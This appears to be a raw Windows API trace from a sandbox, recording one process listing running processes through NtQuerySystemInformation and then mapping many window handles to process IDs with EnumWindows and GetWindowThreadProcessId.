	[0538.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12cdb0b8, Length=0x348d0, ResultLength=0x24dc20 | out: SystemInformation=0x12cdb0b8, ResultLength=0x24dc20*=0x320d0) returned 0x0
	[0538.169] EnumWindows (lpEnumFunc=0x22566ac, lParam=0x0) returned 1
	[0538.170] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x4d0
	[0538.170] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x558
	[0538.170] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x4d0
	[0538.170] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x4d0
	[0538.170] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x4d0
	[0538.170] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x538
	[0538.171] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x4d0
	[0538.171] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x778
	[0538.171] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x778
	[0538.171] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x4d0
	[0538.171] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x4d0
	[0538.171] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x4d0
	[0538.171] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x4d0
	[0538.171] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x4d0
	[0538.171] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x4d0
	[0538.171] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x4d0
	[0538.171] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x4d0
	[0538.171] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x460
	[0538.172] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x4d0
	[0538.172] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x4d0
	[0538.172] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1944
	[0538.172] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x18c8
	[0538.172] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x18ac
	[0538.172] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x18ec
	[0538.172] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1898
	[0538.172] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xc98
	[0538.172] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x153c
	[0538.172] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1808
	[0538.172] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x12a4
	[0538.173] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1740
	[0538.173] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x16c4
	[0538.173] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1820
	[0538.173] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x16ac
	[0538.173] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1858
	[0538.173] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1664
	[0538.173] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x10b4
	[0538.173] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x10ac
	[0538.173] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x10ec
	[0538.173] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1068
	[0538.173] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x17e0
	[0538.173] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x102c
	[0538.174] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x17a4
	[0538.174] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1050
	[0538.174] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1694
	[0538.174] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1770
	[0538.174] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1720
	[0538.174] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x165c
	[0538.174] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1578
	[0538.174] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x16c0
	[0538.174] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x161c
	[0538.174] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1638
	[0538.174] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x15c8
	[0538.175] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1554
	[0538.175] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1674
	[0538.175] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1520
	[0538.175] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x14bc
	[0538.175] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xf8c
	[0538.175] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xe9c
	[0538.175] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1434
	[0538.175] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x14ec
	[0538.175] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xfcc
	[0538.175] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x12ac
	[0538.175] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1484
	[0538.175] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x934
	[0538.175] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xc0c
	[0538.176] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xb08
	[0538.176] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x948
	[0538.176] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1178
	[0538.176] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x13e0
	[0538.176] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xcd0
	[0538.176] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x13fc
	[0538.176] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xdc8
	[0538.176] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xc18
	[0538.176] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xc2c
	[0538.176] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xa1c
	[0538.176] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1244
	[0538.177] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xdb0
	[0538.177] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1398
	[0538.177] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1358
	[0538.177] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1370
	[0538.177] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1340
	[0538.177] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x130c
	[0538.177] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x12c0
	[0538.177] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x12e4
	[0538.177] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1270
	[0538.177] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1298
	[0538.177] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x120c
	[0538.178] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x122c
	[0538.178] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x11c4
	[0538.178] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x11b0
	[0538.178] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1188
	[0538.178] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1148
	[0538.178] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1160
	[0538.178] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x10fc
	[0538.178] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xe34
	[0538.178] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xea4
	[0538.178] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x514
	[0538.178] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xe48
	[0538.178] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xbc8
	[0538.179] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xdf8
	[0538.179] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x318
	[0538.179] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xcac
	[0538.179] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x8bc
	[0538.179] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xf9c
	[0538.180] GetWindow (hWnd=0x10434, uCmd=0x4) returned 0x0
	[0538.180] IsWindowVisible (hWnd=0x10434) returned 0
	[0538.180] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xf48
	[0538.180] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xe40
	[0538.180] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xecc
	[0538.181] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xeb8
	[0538.181] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xe80
	[0538.181] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xe98
	[0538.181] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xe60
	[0538.181] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xee4
	[0538.181] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xf00
	[0538.181] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xdf0
	[0538.181] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xe1c
	[0538.181] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xdd0
	[0538.181] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xd94
	[0538.181] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xd74
	[0538.181] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xd00
	[0538.182] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xcd8
	[0538.182] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xc84
	[0538.182] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xca4
	[0538.182] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xc64
	[0538.182] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xc24
	[0538.182] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xb84
	[0538.182] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xbac
	[0538.182] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x384
	[0538.182] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xab8
	[0538.182] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x33c
	[0538.182] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xa44
	[0538.182] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xa64
	[0538.183] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x8a8
	[0538.183] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xaf0
	[0538.183] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x88c
	[0538.183] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xb04
	[0538.183] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x910
	[0538.183] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x230
	[0538.183] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xac0
	[0538.183] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xab4
	[0538.183] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xaac
	[0538.183] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x3d0
	[0538.183] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x978
	[0538.183] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xa7c
	[0538.184] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x59c
	[0538.184] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xa88
	[0538.184] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xa6c
	[0538.184] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xa68
	[0538.184] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x9f8
	[0538.184] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xa04
	[0538.184] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x924
	[0538.184] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x8dc
	[0538.184] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x7dc
	[0538.184] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x768
	[0538.184] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x764
	[0538.184] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x820
	[0538.185] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x810
	[0538.185] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x794
	[0538.185] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x83c
	[0538.185] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x7ac
	[0538.185] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xb44
	[0538.185] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xb5c
	[0538.185] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x838
	[0538.185] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x4d0
	[0538.185] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x4d0
	[0538.185] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x4d0
	[0538.185] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x4d0
	[0538.186] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x4d0
	[0538.186] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x4d0
	[0538.186] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x4d0
	[0538.186] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x4d0
	[0538.186] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x818
	[0538.186] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x5b8
	[0538.186] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x494
	[0538.186] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1ec
	[0538.186] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x440
	[0538.186] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x7e8
	[0538.186] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x730
	[0538.186] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x2c8
	[0538.186] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x31c
	[0538.187] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x330
	[0538.187] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x128
	[0538.187] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x5c8
	[0538.187] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x6f8
	[0538.187] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x358
	[0538.187] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x73c
	[0538.187] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xb0
	[0539.171] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x250
	[0541.060] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x240
	[0542.135] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x790
	[0543.663] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x61c
	[0544.541] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x540
	[0544.541] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x538
	[0544.541] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x568
	[0544.541] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x538
	[0544.542] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x568
	[0544.542] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x538
	[0544.542] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x540
	[0544.542] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x540
	[0544.542] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x57c
	[0544.542] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x460
